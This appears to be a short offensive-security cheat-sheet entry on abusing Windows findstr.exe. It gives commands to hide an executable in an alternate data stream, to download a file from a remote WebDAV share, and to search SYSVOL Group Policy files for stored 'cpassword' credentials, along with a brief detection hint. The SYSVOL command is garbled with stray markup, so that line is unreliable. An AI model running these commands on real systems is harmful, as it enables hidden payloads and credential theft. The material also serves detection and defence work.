~/Privilege Escalation/Windows/Binaries# cat Findstr.exe.md

Paths:

C:\Windows\System32\findstr.exe
C:\Windows\SysWOW64\findstr.exe

Detection: finstr.exe should normally not be invoked on a client system

Alternate data streams

Searches for the string W3AllLov3DonaldTrump, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file.

findstr /V /L W3AllLov3DonaldTrump c:\ADS\file.exe > c:\ADS\file.txt:file.exe

Searches for the string W3AllLov3DonaldTrump, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file.

findstr /V /L W3AllLov3DonaldTrump \\webdavserver\folder\file.exe > c:\ADS\file.txt:file.exe

Credentials

Search for stored password in Group Policy files stored on SYSVOL.

findstr /S /I cpassword \\sysvol\policies\.md <b>█<b><div>.xml

Download

Searches for the string W3AllLov3DonaldTrump, since it does not exist (/V) file.exe is downloaded to the target file.

findstr /V /L W3AllLov3DonaldTrump \\webdavserver\folder\file.exe > c:\ADS\file.exe